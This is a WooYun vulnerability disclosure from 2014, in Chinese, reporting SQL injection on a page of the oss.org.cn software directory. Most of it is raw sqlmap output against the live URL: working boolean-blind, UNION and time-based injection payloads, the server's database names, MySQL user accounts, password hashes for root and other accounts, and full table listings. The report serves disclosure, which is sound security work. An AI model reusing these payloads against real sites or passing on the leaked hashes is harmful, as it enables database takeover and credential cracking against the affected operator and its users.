当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079592

漏洞标题:开源中国某站点SQL注入致数据库全部沦陷

相关厂商:开源中国

漏洞作者: 爱上平顶山

提交时间:2014-10-16 14:05

修复时间:2014-11-30 14:06

公开时间:2014-11-30 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

...

详细说明:

开源中国
http://www.oss.org.cn
点:
http://yp.oss.org.cn/software/show_demo.php?sw_id=155&demo_no=1
sqlmap identified the following injection points with a total of 32 HTTP(s) requests:
---
Place: GET
Parameter: sw_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sw_id=155' AND 3336=3336 AND 'gJEs'='gJEs&demo_no=1
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: sw_id=155' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e75743a,0x6f456c574d63696c6272,0x3a7077653a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&demo_no=1
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sw_id=155' AND SLEEP(5) AND 'yCzV'='yCzV&demo_no=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sw_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sw_id=155' AND 3336=3336 AND 'gJEs'='gJEs&demo_no=1
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: sw_id=155' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e75743a,0x6f456c574d63696c6272,0x3a7077653a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&demo_no=1
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sw_id=155' AND SLEEP(5) AND 'yCzV'='yCzV&demo_no=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
available databases [15]:
[*] drupal_a
[*] information_schema
[*] mysql
[*] newcopy
[*] nickblog
[*] ossbbs
[*] osscms
[*] performance_schema
[*] phpmyadmin
[*] test
[*] ucenter
[*] uchome
[*] webanalytics
[*] wordpress
[*] yellowpagedb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sw_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sw_id=155' AND 3336=3336 AND 'gJEs'='gJEs&demo_no=1
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: sw_id=155' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e75743a,0x6f456c574d63696c6272,0x3a7077653a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&demo_no=1
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sw_id=155' AND SLEEP(5) AND 'yCzV'='yCzV&demo_no=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
database management system users [147]:
[*] ''@'localhost'
[*] ''@'osscenter435'
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'remoteuser'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'osscenter435'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sw_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sw_id=155' AND 3336=3336 AND 'gJEs'='gJEs&demo_no=1
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: sw_id=155' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e75743a,0x6f456c574d63696c6272,0x3a7077653a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&demo_no=1
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sw_id=155' AND SLEEP(5) AND 'yCzV'='yCzV&demo_no=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *04CDB8BCC75442D8827A0D96E9821B790C1E6ABE
[*] phpmyadmin [1]:
password hash: *48A550A5F098EDBB198D232138CA7C868E449F23
[*] remoteuser [1]:
password hash: *48A550A5F098EDBB198D232138CA7C868E449F23
[*] root [1]:
password hash: *48A550A5F098EDBB198D232138CA7C868E449F23
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sw_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sw_id=155' AND 3336=3336 AND 'gJEs'='gJEs&demo_no=1
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: sw_id=155' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e75743a,0x6f456c574d63696c6272,0x3a7077653a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&demo_no=1
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sw_id=155' AND SLEEP(5) AND 'yCzV'='yCzV&demo_no=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
current database: 'yellowpagedb'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sw_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sw_id=155' AND 3336=3336 AND 'gJEs'='gJEs&demo_no=1
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: sw_id=155' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e75743a,0x6f456c574d63696c6272,0x3a7077653a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&demo_no=1
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sw_id=155' AND SLEEP(5) AND 'yCzV'='yCzV&demo_no=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
Database: yellowpagedb
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| doc_tag_tf | 481642 |
| doc_tag_cos | 481484 |
| doc_tag_tfidf | 481484 |
| doc_tag_cos_temp | 365050 |
| yp_access_statistics | 187795 |
| doc_tag_idf | 138515 |
| sw_score_history | 13183 |
| doc_tagabs | 4241 |
| doc_infor | 4220 |
| sw_score | 2638 |
| sw_info | 2625 |
| search | 2579 |
| sw_platform | 2268 |
| sw_resource | 2167 |
| sw_comment | 1065 |
| user_info | 634 |
| sw_demo | 103 |
| sw_type | 63 |
| yp_module | 27 |
| license | 18 |
| yp_question | 9 |
| yp_platform | 7 |
| function_group | 6 |
| yp_journal | 5 |
| test | 2 |
| yp_keywords | 1 |
+----------------------+---------+
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
Database: ossbbs
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| cdb_memberfields | 15957 |
| cdb_members | 15957 |
| cdb_regips | 8000 |
| cdb_onlinetime | 2977 |
| cdb_admincustom | 1791 |
| cdb_prompt | 1248 |
| cdb_mytasks | 1141 |
| cdb_favoritethreads | 762 |
| cdb_posts | 479 |
| cdb_threads | 250 |
| cdb_settings | 248 |
| cdb_statvars | 216 |
| cdb_stylevars | 141 |
| cdb_rsscaches | 138 |
| cdb_smilies | 89 |
| cdb_typeoptions | 65 |
| cdb_stats | 52 |
| cdb_caches | 42 |
| cdb_faqs | 34 |
| cdb_request | 22 |
| cdb_myposts | 19 |
| cdb_forumfields | 18 |
| cdb_forums | 18 |
| cdb_usergroups | 15 |
| cdb_taskvars | 14 |
| cdb_crons | 12 |
| cdb_magics | 12 |
| cdb_mythreads | 11 |
| cdb_projects | 11 |
| cdb_medals | 10 |
| cdb_creditslog | 7 |
| cdb_tasks | 7 |
| cdb_prompttype | 6 |
| cdb_spacecaches | 6 |
| cdb_words | 6 |
| cdb_navs | 5 |
| cdb_pluginvars | 5 |
| cdb_ranks | 5 |
| cdb_bbcodes | 4 |
| cdb_onlinelist | 4 |
| cdb_typemodels | 4 |
| cdb_addons | 3 |
| cdb_admingroups | 3 |
| cdb_imagetypes | 3 |
| cdb_plugins | 3 |
| cdb_styles | 3 |
| cdb_tags | 3 |
| cdb_templates | 3 |
| cdb_threadtags | 3 |
| cdb_itempool | 2 |
| cdb_moderators | 2 |
| cdb_adminsessions | 1 |
| cdb_attachments | 1 |
| cdb_failedlogins | 1 |
| cdb_invites | 1 |
+---------------------+---------+
ok 不深入~

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2014-10-16 14:18 | 开源中国(乌云厂商)

    还是要把域名写上,要不还以为是 oschina.net 呢,这个漏洞是 oss.org.cn

  2. 2014-10-16 14:31 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @开源中国 不好意思 是乌云指错了 我是只给互联网应急中心的 呵呵

  3. 2014-10-16 15:28 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @开源中国 红薯的菊花是不是又是一紧~

  4. 2014-10-17 07:08 | teamtopkarl ( 实习白帽子 | Rank:48 漏洞数:7 | 对网络安全事业一直保持着激情)

    我在360早发过了